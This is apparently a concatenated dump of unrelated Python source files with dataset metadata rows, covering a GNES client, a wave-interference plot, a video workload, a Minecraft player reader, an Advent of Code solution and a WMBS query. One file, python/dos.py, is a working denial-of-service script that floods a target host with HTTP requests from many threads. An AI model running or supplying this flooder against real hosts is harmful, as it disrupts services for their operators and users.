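    """Hypothetical example: i.i.d. Gaussian errors, no correlation."""

    def loglike_contribution(
        self, model_response_dict: dict, prms: dict, worst_value: float = -np.infty
    ) -> float:
        std = prms["std"]
        if std <= 0:
            return worst_value  # invalid parameter -> worst possible value
        mean = 0.0 if self.zero_mean else prms["mean"]
        ll = 0.0
        for error_vector in self.error(model_response_dict).values():
            res = error_vector - mean
            n = len(res)
            # log of prod_i N(res_i; 0, std^2)
            ll += -0.5 * (
                n * np.log(2 * np.pi * std ** 2) + np.sum(res ** 2) / std ** 2
            )
        return ll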

# File: gnes/client/cli.py  (repo: dixiak/gnes, license: Apache-2.0)

# Tencent is pleased to support the open source community by making GNES available.
#
# Copyright (C) 2019 THL A29 Limited, a Tencent company. All rights reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

import sys
import time
import zipfile
from math import ceil
from typing import List

from termcolor import colored

from .base import GrpcClient
from ..proto import RequestGenerator, gnes_pb2


class CLIClient(GrpcClient):

    def __init__(self, args):
        super().__init__(args)
        getattr(self, self.args.mode)(self.read_all())
        self.close()

    def train(self, all_bytes: List[bytes]):
        with ProgressBar(all_bytes, self.args.batch_size, task_name=self.args.mode) as p_bar:
            for _ in self._stub.StreamCall(RequestGenerator.train(all_bytes,
                                                                  doc_id_start=self.args.start_doc_id,
                                                                  batch_size=self.args.batch_size)):
                p_bar.update()

    def index(self, all_bytes: List[bytes]):
        with ProgressBar(all_bytes, self.args.batch_size, task_name=self.args.mode) as p_bar:
            for _ in self._stub.StreamCall(RequestGenerator.index(all_bytes,
                                                                  doc_id_start=self.args.start_doc_id,
                                                                  batch_size=self.args.batch_size)):
                p_bar.update()

    def query(self, all_bytes: List[bytes]):
        for idx, q in enumerate(all_bytes):
            for req in RequestGenerator.query(q, request_id_start=idx, top_k=self.args.top_k):
                resp = self._stub.Call(req)
                self.query_callback(req, resp)

    def query_callback(self, req: 'gnes_pb2.Request', resp: 'gnes_pb2.Response'):
        """
        Callback invoked after getting the query result;
        override this method to customize query behavior.

        :param resp: response
        :param req: query
        :return:
        """
        print(req)
        print(resp)

    def read_all(self) -> List[bytes]:
        if self.args.txt_file:
            all_bytes = [v.encode() for v in self.args.txt_file]
        elif self.args.image_zip_file:
            zipfile_ = zipfile.ZipFile(self.args.image_zip_file)
            all_bytes = [zipfile_.open(v).read() for v in zipfile_.namelist()]
        elif self.args.video_zip_file:
            zipfile_ = zipfile.ZipFile(self.args.video_zip_file)
            all_bytes = [zipfile_.open(v).read() for v in zipfile_.namelist()]
        else:
            raise AttributeError('one of --txt_file, --image_zip_file, --video_zip_file must be given')
        return all_bytes


class ProgressBar:

    def __init__(self, all_bytes: List[bytes], batch_size: int, bar_len: int = 20, task_name: str = ''):
        self.all_bytes_len = [len(v) for v in all_bytes]
        self.batch_size = batch_size
        self.total_batch = ceil(len(self.all_bytes_len) / self.batch_size)
        self.bar_len = bar_len
        self.task_name = task_name

    def update(self):
        if self.num_batch > self.total_batch - 1:
            return
        sys.stdout.write('\r')
        elapsed = time.perf_counter() - self.start_time
        elapsed_str = colored('elapsed', 'yellow')
        speed_str = colored('speed', 'yellow')
        estleft_str = colored('left', 'yellow')
        self.num_batch += 1
        percent = self.num_batch / self.total_batch
        num_bytes = sum(self.all_bytes_len[((self.num_batch - 1) * self.batch_size):(self.num_batch * self.batch_size)])
        sys.stdout.write(
            '{:>10} [{:<{}}] {:3.0f}% {:>8}: {:3.1f}s {:>8}: {:3.1f} bytes/s {:3.1f} batch/s {:>8}: {:3.1f}s'.format(
                colored(self.task_name, 'cyan'),
                colored('=' * int(self.bar_len * percent), 'green'),
                self.bar_len + 9,
                percent * 100,
                elapsed_str,
                elapsed,
                speed_str,
                num_bytes / elapsed,
                self.num_batch / elapsed,
                estleft_str,
                (self.total_batch - self.num_batch) / ((self.num_batch + 0.0001) / elapsed)
            ))
        sys.stdout.flush()

    def __enter__(self):
        self.start_time = time.perf_counter()
        self.num_batch = -1
        sys.stdout.write('\n')
        self.update()
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        sys.stdout.write('\t%s\n' % colored('done!', 'green'))
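
# query_callback simply prints the raw protobuf messages, and its docstring
# invites overriding. A hypothetical override that logs one compact line per
# query instead; it only uses ByteSize(), a standard protobuf message method,
# and deliberately assumes nothing else about the gnes_pb2 schema.
class QuietCLIClient(CLIClient):
    def query_callback(self, req: 'gnes_pb2.Request', resp: 'gnes_pb2.Response'):
        print('request %d bytes -> response %d bytes' % (req.ByteSize(), resp.ByteSize()))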

# File: wave path difference/3d.py  (repo: muronglengjing/sound-wave, license: MIT)

import numpy as np
import matplotlib.pyplot as plt
from matplotlib.widgets import Slider
import matplotlib.animation as animation


# distance from a point to a plane ax + by + cz + d = 0
class F:
    def __init__(self, a, b, c, d):
        self.a = a
        self.b = b
        self.c = c
        self.d = d

    def distance(self, x, y, z):
        # point-to-plane distance |ax + by + cz + d| / sqrt(a^2 + b^2 + c^2)
        return np.abs((self.a*x + self.b*y + self.c*z + self.d)
                      / (np.sqrt(self.a**2 + self.b**2 + self.c**2)))


# convert grid indices to real-space coordinates
def axic(x, y, z):
    _x = x * _w / _N
    _y = y * _l / _M
    _z = z * _h / _O
    return _x, _y, _z


# variable
L = 9

# constants
_pi = 3.1415926

# wave: speed of sound, frequency, wavelength, angular frequency
_u = 343
_v = 40000
_lambda = _u / _v
_w = 2*_pi*_v

# grid resolution
_N, _M, _O = 20, 20, 20

# create zero array
array = np.zeros((_N, _M, _O))

# box dimensions (length, width, height); note this reuses and overwrites _w,
# which above held the (unused) angular frequency
_l = L * _lambda / 2
_w = L * _lambda / 2
_h = L * _lambda / 2

f1 = F(0, 0, 1, 0)
f2 = F(0, 0, 1, -_h)

for i in range(0, _N):
    for j in range(0, _M):
        for k in range(0, _O):
            _x, _y, _z = axic(i, j, k)
            array[i][j][k] = _pi * (f1.distance(_x, _y, _z) + _lambda/2 - f2.distance(_x, _y, _z)) / _lambda

array = np.cos(array)
array = np.abs(array)

contour = plt.contourf(array[0, :, :])
plt.colorbar(contour)
plt.show()
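
# For context: each grid cell holds the phase term pi * (d1 + lambda/2 - d2) / lambda,
# where d1 and d2 are the distances to the two source planes z = 0 and z = _h;
# |cos| of that phase then gives the interference amplitude. A quick sanity
# check of the F.distance helper (the test point is chosen here for illustration):
# the point (0, 0, _h) lies on the plane z = _h, so its distance to f2 is 0 and
# to f1 (the plane z = 0) exactly _h.
assert abs(f2.distance(0, 0, _h)) < 1e-12
assert abs(f1.distance(0, 0, _h) - _h) < 1e-12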

# File: wlauto/workloads/video/__init__.py  (repo: joesavage/workload-automation, license: Apache-2.0)

# Copyright 2013-2015 ARM Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#

# pylint: disable=E1101,E0203,W0201
import os
import urllib
from collections import defaultdict

from wlauto import Workload, settings, Parameter, Alias
from wlauto.exceptions import ConfigError, WorkloadError
from wlauto.utils.misc import ensure_directory_exists as _d
from wlauto.utils.types import boolean

DOWNLOAD_URLS = {
    '1080p': 'http://download.blender.org/peach/bigbuckbunny_movies/big_buck_bunny_1080p_surround.avi',
    '720p': 'http://download.blender.org/peach/bigbuckbunny_movies/big_buck_bunny_720p_surround.avi',
    '480p': 'http://download.blender.org/peach/bigbuckbunny_movies/big_buck_bunny_480p_surround-fix.avi'
}


class VideoWorkload(Workload):
    name = 'video'
    description = """
    Plays a video file using the standard android video player for a predetermined duration.

    The video can be specified either using the ``resolution`` workload parameter, in which
    case a `Big Buck Bunny`_ video of that resolution will be downloaded and used, or using
    the ``filename`` parameter, in which case the video file specified will be used.

    .. _Big Buck Bunny: http://www.bigbuckbunny.org/

    """
    supported_platforms = ['android']

    parameters = [
        Parameter('play_duration', kind=int, default=20,
                  description='Playback duration of the video file. This becomes the duration of the workload.'),
        Parameter('resolution', default='720p', allowed_values=['480p', '720p', '1080p'],
                  description='Specifies which resolution video file to play.'),
        Parameter('filename',
                  description="""
                  The name of the video file to play. This can be either a path
                  to the file anywhere on your file system, or it could be just a
                  name, in which case, the workload will look for it in
                  ``~/.workloads_automation/dependency/video``

                  *Note*: either resolution or filename should be specified, but not both!
                  """),
        Parameter('force_dependency_push', kind=boolean, default=False,
                  description="""
                  If true, the video will always be pushed to the device, regardless
                  of whether the file is already on the device. Default is ``False``.
                  """),
    ]

    aliases = [
        Alias('video_720p', resolution='720p'),
        Alias('video_1080p', resolution='1080p'),
    ]

    @property
    def host_video_file(self):
        if not self._selected_file:
            if self.filename:
                if self.filename[0] in './' or len(self.filename) > 1 and self.filename[1] == ':':
                    filepath = os.path.abspath(self.filename)
                else:
                    filepath = os.path.join(self.video_directory, self.filename)
                if not os.path.isfile(filepath):
                    raise WorkloadError('{} does not exist.'.format(filepath))
                self._selected_file = filepath
            else:
                files = self.video_files[self.resolution]
                if not files:
                    url = DOWNLOAD_URLS[self.resolution]
                    filepath = os.path.join(self.video_directory, os.path.basename(url))
                    self.logger.debug('Downloading {}...'.format(filepath))
                    urllib.urlretrieve(url, filepath)
                    self._selected_file = filepath
                else:
                    self._selected_file = files[0]
                    if len(files) > 1:
                        self.logger.warn('Multiple files for 720p found. Using {}.'.format(self._selected_file))
                        self.logger.warn('Use \'filename\' parameter instead of \'resolution\' to specify a different file.')
        return self._selected_file

    def init_resources(self, context):
        self.video_directory = _d(os.path.join(settings.dependencies_directory, 'video'))
        self.video_files = defaultdict(list)
        self.enum_video_files()
        self._selected_file = None

    def setup(self, context):
        on_device_video_file = os.path.join(self.device.working_directory, os.path.basename(self.host_video_file))
        if self.force_dependency_push or not self.device.file_exists(on_device_video_file):
            self.logger.debug('Copying {} to device.'.format(self.host_video_file))
            self.device.push_file(self.host_video_file, on_device_video_file, timeout=120)
        self.device.clear_logcat()
        command = 'am start -W -S -n com.android.gallery3d/.app.MovieActivity -d {}'.format(on_device_video_file)
        self.device.execute(command)

    def run(self, context):
        self.device.sleep(self.play_duration)

    def update_result(self, context):
        self.device.execute('am force-stop com.android.gallery3d')

    def teardown(self, context):
        pass

    def validate(self):
        if (self.resolution and self.filename) and (self.resolution != self.parameters['resolution'].default):
            raise ConfigError('Either resolution *or* filename must be specified, but not both.')

    def enum_video_files(self):
        for filename in os.listdir(self.video_directory):
            for resolution in self.parameters['resolution'].allowed_values:
                if resolution in filename:
                    self.video_files[resolution].append(os.path.join(self.video_directory, filename))

# File: pyGAE/app_config.py  (repo: analyticstraining/pycocms, license: MIT)

'''
Configuration script in Python.
Add a secret key: replace 'YOUR_SECRET_KEY' below with your own value.
'''
APP_CONFIG = {
'webapp2_extras.auth': {
'user_model': 'models.User',
'user_attributes': ['name', "email_address"]
},
'webapp2_extras.sessions': {
'secret_key': 'YOUR_SECRET_KEY'
}
}
APP_NAME = "pycoCMS"
MAIL_SENDER = 'pycoCMS@pycoCMS.org' | 19.823529 | 52 | 0.626113 | 38 | 337 | 5.236842 | 0.684211 | 0.135678 | 0.120603 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007576 | 0.216617 | 337 | 17 | 53 | 19.823529 | 0.746212 | 0.142433 | 0 | 0 | 0 | 0 | 0.517731 | 0.08156 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
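# --- Usage sketch (not from the original config file) ---
# Shows how webapp2 keys into the config above; assumes APP_CONFIG from
# this module is in scope.
auth_cfg = APP_CONFIG['webapp2_extras.auth']
assert auth_cfg['user_model'] == 'models.User'
assert auth_cfg['user_attributes'] == ['name', 'email_address']
assert 'secret_key' in APP_CONFIG['webapp2_extras.sessions']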
e2d40cbadb8b28d4ec71d0513975ed33675020aa | 627 | py | Python | Cloud/2/ATMClientCLI.py | hsinewu/School | 2c55a3fd4a7794e64651b66d36f439a11c180b2c | [
"MIT"
] | null | null | null | Cloud/2/ATMClientCLI.py | hsinewu/School | 2c55a3fd4a7794e64651b66d36f439a11c180b2c | [
"MIT"
] | null | null | null | Cloud/2/ATMClientCLI.py | hsinewu/School | 2c55a3fd4a7794e64651b66d36f439a11c180b2c | [
"MIT"
] | null | null | null | # Echo client program
import socket, sys, threading
HOST = 'localhost' # The remote host
PORT = 54321 # The same port as used by the server
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((HOST, PORT))
def sending():
while 1:
sock.sendall(raw_input())
def receiving():
while 1:
data = sock.recv(1024)
if data=='exit':
sock.close()
sys.exit()
sys.stdout.write(data)
r = threading.Thread(target=receiving)
s = threading.Thread(target=sending)
r.start()
s.start()
r.join()
s.join()
# sock.close()
| 20.9 | 59 | 0.633174 | 86 | 627 | 4.581395 | 0.55814 | 0.040609 | 0.106599 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.022965 | 0.236045 | 627 | 29 | 60 | 21.62069 | 0.799582 | 0.133971 | 0 | 0.090909 | 0 | 0 | 0.024164 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.090909 | 0 | 0.181818 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
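# --- Usage sketch (not from the original client) ---
# A minimal Python 2 echo server to exercise the client above: it echoes
# every message back and, per the client's convention, echoing 'exit'
# makes the client close its socket and terminate.
import socket

srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
srv.bind(('localhost', 54321))
srv.listen(1)
conn, addr = srv.accept()
while 1:
    data = conn.recv(1024)
    if not data:
        break
    conn.sendall(data)
conn.close()
srv.close()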
e2d4c6363a58b677b5bab043fe856e68f531b918 | 782 | py | Python | python/dos.py | PrestonMonteWest/bin | d7ed1eea9d60d58a6f8af5bdc22da646c585407d | [
"Unlicense"
] | null | null | null | python/dos.py | PrestonMonteWest/bin | d7ed1eea9d60d58a6f8af5bdc22da646c585407d | [
"Unlicense"
] | null | null | null | python/dos.py | PrestonMonteWest/bin | d7ed1eea9d60d58a6f8af5bdc22da646c585407d | [
"Unlicense"
] | null | null | null | #!/usr/bin/env python3
from socket import socket, AF_INET, SOCK_STREAM
from threading import Thread
from multiprocessing import cpu_count
import sys
def attack(host, port, num):
s = socket(AF_INET, SOCK_STREAM)
s.connect((host, port))
while True:
print('Thread {} : Sending request to {}:{}...'.format(num, host, port))
        s.send(
            (
                'GET / HTTP/1.1\r\n'
                'Host: {}\r\n'
                '\r\n'
            ).format(host).encode('utf-8')
        )
if __name__ == '__main__':
host = sys.argv[1]
try:
port = int(sys.argv[2])
except (IndexError, ValueError):
port = 80
for i in range(cpu_count() * 2):
t = Thread(target=attack, args=(host, port, i + 1))
t.start()
| 24.4375 | 80 | 0.539642 | 103 | 782 | 3.961165 | 0.572816 | 0.078431 | 0.058824 | 0.078431 | 0.107843 | 0 | 0 | 0 | 0 | 0 | 0 | 0.018553 | 0.310742 | 782 | 31 | 81 | 25.225806 | 0.738404 | 0.026854 | 0 | 0 | 0 | 0 | 0.113158 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.04 | false | 0 | 0.16 | 0 | 0.2 | 0.04 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e2d5d4f0834f8da2bcbaa8cad00c966d5e044936 | 425 | py | Python | stylo/testing/examples.py | mvinoba/stylo | 84f3a74cf9cb29c6d24b990dc9a474562114392b | [
"MIT"
] | null | null | null | stylo/testing/examples.py | mvinoba/stylo | 84f3a74cf9cb29c6d24b990dc9a474562114392b | [
"MIT"
] | null | null | null | stylo/testing/examples.py | mvinoba/stylo | 84f3a74cf9cb29c6d24b990dc9a474562114392b | [
"MIT"
] | null | null | null | import pytest
def define_benchmarked_example(name, example):
import matplotlib
matplotlib.use("Agg")
image = example()
@pytest.mark.parametrize("n", [512, 1024, 2048])
def benchmark_test(benchmark, n):
filename = None
if n == 512:
filename = "docs/_static/examples/" + name.lower() + ".png"
benchmark(image, n, n, filename=filename)
return benchmark_test
| 18.478261 | 71 | 0.623529 | 48 | 425 | 5.416667 | 0.583333 | 0.030769 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.044164 | 0.254118 | 425 | 22 | 72 | 19.318182 | 0.776025 | 0 | 0 | 0 | 0 | 0 | 0.070588 | 0.051765 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.166667 | 0 | 0.416667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
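# --- Usage sketch (not from the original module) ---
# How a test module might consume define_benchmarked_example(); assumes
# matplotlib and pytest-benchmark are installed. fake_example() is a
# hypothetical stand-in for a real stylo example that returns a callable
# image(width, height, filename=...).
def fake_example():
    def image(width, height, filename=None):
        return (width, height, filename)
    return image


# pytest collects this module-level name and injects the `benchmark` fixture:
test_fake_benchmark = define_benchmarked_example("fake", fake_example)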
e2d8e578b36c81838d94eacbe7d5ce89b3fd1df5 | 2,700 | py | Python | pycraft/player.py | PapaMarky/pycraft | 919fe000ae7f1d2dd715d0468957d67ca61725b4 | [
"MIT"
] | null | null | null | pycraft/player.py | PapaMarky/pycraft | 919fe000ae7f1d2dd715d0468957d67ca61725b4 | [
"MIT"
] | null | null | null | pycraft/player.py | PapaMarky/pycraft | 919fe000ae7f1d2dd715d0468957d67ca61725b4 | [
"MIT"
] | null | null | null | import glob
import os
import python_nbt.nbt as nbt
import requests
from pycraft.error import PycraftException
from pycraft.region import Region
class Player:
def __init__(self, world_path):
if not os.path.exists(world_path):
print(f'Saved world not found: "{world_path}"')
raise PycraftException('World not found')
flist = glob.glob(os.path.join(world_path, 'playerdata', '*.dat'))
if len(flist) < 1:
print('No players found')
raise PycraftException('Not enough players')
if len(flist) > 1:
print('Too many players:')
for f in flist:
print(f' - {f}')
raise PycraftException('Too many players')
uuid = ''.join(os.path.basename(flist[0])[:-4].split('-'))
self._uuid = uuid
self._path = flist[0]
self._nbt_data = nbt.read_from_nbt_file(self._path)
self._world_path = world_path
self._region = None
self._username = None
@staticmethod
def get_username(uuid):
r = requests.get(f'https://sessionserver.mojang.com/session/minecraft/profile/{uuid}')
if r.ok:
data = r.json()
name = data.get('name', 'UNKNOWN')
# There are other things (skin.png, cape.png) that you can get
# See https://wiki.vg/Mojang_API#UUID_to_Name_History
# for p in data['properties']:
# print(f'---{p["name"]}---')
# metadata[p['name']] = json.loads(base64.b64decode(p['value']))
# print(f'{metadata}')
else:
name = 'ERROR'
return name
def get_attr_list(self):
return list(self._nbt_data)
def get_attr(self, name):
if name in self._nbt_data:
return self._nbt_data[name]
def get_region(self):
if self._region:
return self._region
p = self.position
self._region = Region.from_position_xy(self._world_path, p[0], p[2])
return self._region
def get_vehicle(self):
v = self.get_attr('RootVehicle')
return v
@property
def chunk_position(self):
p = self.position
return int(p[0] / 16), int(p[1] / 16), int(p[2] / 16)
@property
def position(self):
return self.get_attr('Pos').json_obj(full_json=False)
@property
def inventory(self):
return self.get_attr('Inventory').json_obj(full_json=False)
@property
def uuid(self):
return self._uuid
@property
def username(self):
if self._username is None:
self._username = Player.get_username(self.uuid)
return self._username
| 29.67033 | 94 | 0.583333 | 346 | 2,700 | 4.381503 | 0.309249 | 0.041557 | 0.029024 | 0.014512 | 0.08971 | 0.040897 | 0.040897 | 0 | 0 | 0 | 0 | 0.01051 | 0.295185 | 2,700 | 90 | 95 | 30 | 0.786127 | 0.097778 | 0 | 0.132353 | 0 | 0 | 0.100906 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.161765 | false | 0 | 0.088235 | 0.058824 | 0.426471 | 0.058824 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
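# --- Usage sketch (not from the original module) ---
# Typical single-player use; 'saves/MyWorld' is a hypothetical path to a
# Minecraft save directory containing playerdata/<uuid>.dat.
# player = Player('saves/MyWorld')
# print(player.uuid)
# print(player.position)        # [x, y, z]
# print(player.chunk_position)  # position scaled down to chunk coordinates
# print(player.username)        # resolved via the Mojang session server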
e2da1b80294662dc1e56bd780492fbf92dc01da3 | 387 | py | Python | day13/part2.py | BaderSZ/adventofcode2020 | dae705fd093bbd176021118f0898947cb4b02f84 | [
"MIT"
] | null | null | null | day13/part2.py | BaderSZ/adventofcode2020 | dae705fd093bbd176021118f0898947cb4b02f84 | [
"MIT"
] | null | null | null | day13/part2.py | BaderSZ/adventofcode2020 | dae705fd093bbd176021118f0898947cb4b02f84 | [
"MIT"
] | null | null | null |
inp = []
with open("input", "r") as f:
for line in f.readlines():
inp = inp + line.rsplit()[0].split(",")
# In form (BUS_ID, index)
busses = [(int(x), i) for i, x in enumerate(inp[1:]) if x != "x"]
# Chinese remainder theorem
time = 0
prod = 1
for bus_id, offset in busses:
    while (time + offset) % bus_id != 0:
        time = time + prod
    prod = prod * bus_id
print("Result = ", time)
| 17.590909 | 65 | 0.542636 | 63 | 387 | 3.31746 | 0.52381 | 0.076555 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.017731 | 0.271318 | 387 | 21 | 66 | 18.428571 | 0.723404 | 0.126615 | 0 | 0 | 0 | 0 | 0.051051 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.083333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
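# --- Worked example (not part of the original solution) ---
# The loop above is an incremental Chinese-remainder sieve: once a bus is
# satisfied, stepping by the product of all ids seen so far preserves the
# earlier congruences. On the AoC 2020 sample "7,13,x,x,59,x,31,19" it
# gives the published answer 1068781:
sample = [(7, 0), (13, 1), (59, 4), (31, 6), (19, 7)]
t, step = 0, 1
for bus_id, offset in sample:
    while (t + offset) % bus_id != 0:
        t += step
    step *= bus_id
assert t == 1068781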
e2dc3c2e573af6b5ac4a24e0a8a5e7d24b83ef56 | 1,143 | py | Python | setup.py | torstenfeld/django-warrant | ad19b9c9aefb9e44f6a01c07d11dc41809f88881 | [
"BSD-3-Clause"
] | 167 | 2017-04-21T17:54:14.000Z | 2022-02-19T20:37:44.000Z | setup.py | torstenfeld/django-warrant | ad19b9c9aefb9e44f6a01c07d11dc41809f88881 | [
"BSD-3-Clause"
] | 15 | 2017-08-31T12:33:18.000Z | 2021-07-03T06:36:36.000Z | setup.py | torstenfeld/django-warrant | ad19b9c9aefb9e44f6a01c07d11dc41809f88881 | [
"BSD-3-Clause"
] | 56 | 2017-06-15T17:26:43.000Z | 2022-03-30T15:15:42.000Z | import os
from setuptools import setup, find_packages
def parse_requirements(filename):
""" load requirements from a pip requirements file """
lineiter = (line.strip() for line in open(filename))
return [line for line in lineiter if line and not line.startswith("#")]
version = '0.1.1'
README="""Django library that uses the warrant python utility library to provide authentication via AWS Cognito."""
setup(
name='django-warrant',
version=version,
description=README,
long_description=README,
classifiers=[
'Framework :: Django',
'Framework :: Django :: 1.10',
"Programming Language :: Python",
"Topic :: Software Development :: Libraries :: Python Modules",
"Environment :: Web Environment",
],
keywords='aws,cognito,api,gateway,django',
author='MetaMetrics',
author_email='engineering@lexile.com',
packages=find_packages(exclude=('cdu',)),
url='https://github.com/MetaMetricsInc/django-warrant',
license='GNU GPL V3',
install_requires=parse_requirements('requirements.txt'),
include_package_data=True,
zip_safe=True,
)
| 28.575 | 115 | 0.684164 | 131 | 1,143 | 5.89313 | 0.664122 | 0.031088 | 0.023316 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007576 | 0.191601 | 1,143 | 39 | 116 | 29.307692 | 0.827922 | 0.040245 | 0 | 0 | 0 | 0 | 0.393021 | 0.04775 | 0 | 0 | 0 | 0 | 0 | 1 | 0.034483 | false | 0 | 0.068966 | 0 | 0.137931 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e2dd633808e9b6b31f7be658d3a59c23ec67ec01 | 1,599 | py | Python | src/python/WMCore/WMBS/MySQL/Subscriptions/GetSubsWithoutJobGroup.py | khurtado/WMCore | f74e252412e49189a92962945a94f93bec81cd1e | [
"Apache-2.0"
] | 21 | 2015-11-19T16:18:45.000Z | 2021-12-02T18:20:39.000Z | src/python/WMCore/WMBS/MySQL/Subscriptions/GetSubsWithoutJobGroup.py | khurtado/WMCore | f74e252412e49189a92962945a94f93bec81cd1e | [
"Apache-2.0"
] | 5,671 | 2015-01-06T14:38:52.000Z | 2022-03-31T22:11:14.000Z | src/python/WMCore/WMBS/MySQL/Subscriptions/GetSubsWithoutJobGroup.py | khurtado/WMCore | f74e252412e49189a92962945a94f93bec81cd1e | [
"Apache-2.0"
] | 67 | 2015-01-21T15:55:38.000Z | 2022-02-03T19:53:13.000Z | #!/usr/bin/env python
from __future__ import division, print_function
from WMCore.Database.DBFormatter import DBFormatter
class GetSubsWithoutJobGroup(DBFormatter):
"""
_GetSubsWithoutJobGroup_
Finds whether there are unfinished subscriptions for Production and
Processing task types where JobCreator hasn't yet created any jobs
nor a jobgroup associated to it.
"""
sql = """SELECT wmbs_subscription.id, wmbs_workflow.task FROM wmbs_subscription
INNER JOIN wmbs_sub_types ON wmbs_sub_types.id = wmbs_subscription.subtype
INNER JOIN wmbs_workflow ON wmbs_workflow.id = wmbs_subscription.workflow
WHERE wmbs_subscription.finished=0 AND
wmbs_sub_types.name IN ('Production','Processing') AND
NOT EXISTS (SELECT * FROM wmbs_jobgroup
WHERE wmbs_jobgroup.subscription = wmbs_subscription.id)
"""
def format(self, result):
"""
        Keep only task names that contain at most two slashes '/',
        so that those tasks can be declared top-level tasks.
:param result:
:return: a list of subscriptions id
"""
results = DBFormatter.format(self, result)
subIDs = []
for row in results:
if len(row[1].split('/')) <= 3: # remember, first item is empty
subIDs.append(row[0])
return subIDs
def execute(self, conn=None, transaction=False):
result = self.dbi.processData(self.sql, conn=conn, transaction=transaction)
return self.format(result)
| 35.533333 | 89 | 0.65666 | 189 | 1,599 | 5.428571 | 0.550265 | 0.093567 | 0.035088 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003422 | 0.268918 | 1,599 | 44 | 90 | 36.340909 | 0.874252 | 0.258286 | 0 | 0 | 0 | 0 | 0.468468 | 0.156757 | 0 | 0 | 0 | 0 | 0 | 1 | 0.095238 | false | 0 | 0.095238 | 0 | 0.380952 | 0.047619 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
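# --- Usage sketch (not from the original DAO) ---
# WMCore DAOs are usually obtained through a DAOFactory rather than being
# instantiated directly; the wiring below reflects the common WMCore
# pattern and is an assumption, not code taken from this file.
# from WMCore.DAOFactory import DAOFactory
#
# daofactory = DAOFactory(package="WMCore.WMBS",
#                         logger=logger, dbinterface=dbi)
# action = daofactory(classname="Subscriptions.GetSubsWithoutJobGroup")
# sub_ids = action.execute()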
e2ddd4f9ac3b25764edd0fce1bfdd7ca076702ea | 1,092 | py | Python | experiments/summarize_svdf_linkpred_sweep.py | samihaija/tf-fsvd | 677cad8cfa21668369ce39c515874dabfbc021d5 | [
"MIT"
